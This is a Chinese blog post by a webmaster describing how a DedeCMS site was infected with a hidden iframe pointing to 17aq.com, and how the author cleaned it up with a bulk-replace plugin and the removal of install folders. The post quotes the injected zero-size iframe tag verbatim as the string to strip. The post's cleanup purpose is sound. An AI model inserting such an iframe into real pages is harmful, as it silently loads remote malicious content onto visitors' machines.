6
07
我的一个用dedecms建立的网站被挂马了。
登录后台时发现后台登录一片空白,查看源码,发现被17aq挂马了。所有动态网页都被挂马。
也许是前一段忘了加小说补丁,不知道是不是这个原因。
我查看文件日期,发现include下面的php文件70%都是6月1日,估计被篡改了,我不想逐个修改。就重新上传include下面的php文件覆盖网站的文件。
问题解决了,现在后台登录正常了。
但是我检查发现其他目录下的文件也挂马了。好在dedecms有一个插件一解决。否则逐个上传真是麻烦。
批量修改网站挂马文件方法如下:
进入后台以后,可以批量修改挂马文件。
步骤如下:
1、首先上传覆盖:dede/virus_search.php
2、进入辅助插件—木马扫描检测——替换内容
替换内容:
iframe src=http://www.17aq.com/17aq/tongji.htm width=0 height=0></iframe>
换 为:一个空格
现在基本都修改了。
如何预防再次中招,不知道有没有什么好办法。
另外:install相关文件夹一定要删除。我一个网站删除了install相关文件夹,好像没有感染。没删除的无一幸免,即使是其他cms。估计是“种马”扫描网站的install文件和文件夹来批量挂马。
其他cms可以参照此方法,如果没有这个插件,可以在同一个服务器安装dedecms,根据路径查杀。
相关日志
View:269 views
.text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus(); "添加到POCO网摘"){kind=logo}
1 Response
Leave a Response
Note!
You must be logged in to post a comment.